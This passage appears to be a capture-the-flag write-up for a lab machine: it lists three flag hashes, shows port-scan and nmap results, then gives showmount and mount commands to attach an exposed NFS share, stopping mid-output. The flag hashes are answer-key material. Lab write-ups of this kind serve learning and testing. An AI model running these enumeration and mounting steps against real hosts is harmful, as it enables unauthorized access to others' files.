FLAG49

41b779ac4c999468ba7f862cde86412096d1c37b

FLAG50

8f776e191c1253159ed20aa683b5d5969a804b83

FLAG51

f4ba5b1880b551f847276ed71e692e4f1727eb0e

Enumeration

rustscan -a 10.150.150.134

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack
111/tcp   open  rpcbind syn-ack
2049/tcp  open  nfs     syn-ack
8089/tcp  open  unknown syn-ack
34154/tcp open  unknown syn-ack
40110/tcp open  unknown syn-ack
45783/tcp open  unknown syn-ack

nmap -sC -sV 10.150.150.134

PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 5.3p1 Debian 3ubuntu7.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f6:e9:3f:cf:88:ec:7c:35:63:91:34:aa:14:55:49:cc (DSA)
|_  2048 20:1d:e9:90:6f:4b:82:a3:71:1e:a9:99:95:7f:31:ea (RSA)
111/tcp  open     rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      34154/tcp   mountd
|   100005  1,2,3      50354/udp   mountd
|   100021  1,3,4      45783/tcp   nlockmgr
|   100021  1,3,4      48262/udp   nlockmgr
|   100024  1          38840/udp   status
|_  100024  1          40110/tcp   status
1114/tcp filtered mini-sql
2049/tcp open     nfs      2-4 (RPC #100003)
8089/tcp open     ssl/http Splunkd httpd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-28T09:51:59
|_Not valid after:  2022-10-27T09:51:59
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have port NFS which run on port 2049. Network File System, or NFS, allows remote hosts to mount the systems/directories over a network. An NFS server can export a directory that can be mounted on a remote Linux machine. This allows the user to share the data centrally to all the machines in the network.

Exploitation

showmount -e 10.150.150.134

Export list for 10.150.150.134:
/srv/exportnfs 10.0.0.0/8

Now we know there is a directory called /srv/exportnfs Now we can create a temporarily folder in our /mnt/ and mount the target to our machine

sudo mkdir /mnt/FullMounty

sudo mount -v -t  nfs  -o vers=3,proto=tcp,nolock 10.150.150.134:/srv/exportnfs /mnt/FullMounty

You will see these output

mount.nfs: timeout set for Thu Jan 27 09:47:41 2022
mount.nfs: trying text-based options 'vers=3,proto=tcp,nolock,addr=10.150.150.134'
mount.nfs: prog 100003, trying vers=3, prot=6
mount.nfs: trying 10.150.150.134 prog 100003 vers 3 prot TCP port 2049
mount.nfs: prog 100005, trying vers=3, prot=6
mount.nfs: trying 10.150.150.134 prog 100005 vers 3 prot TCP port 34154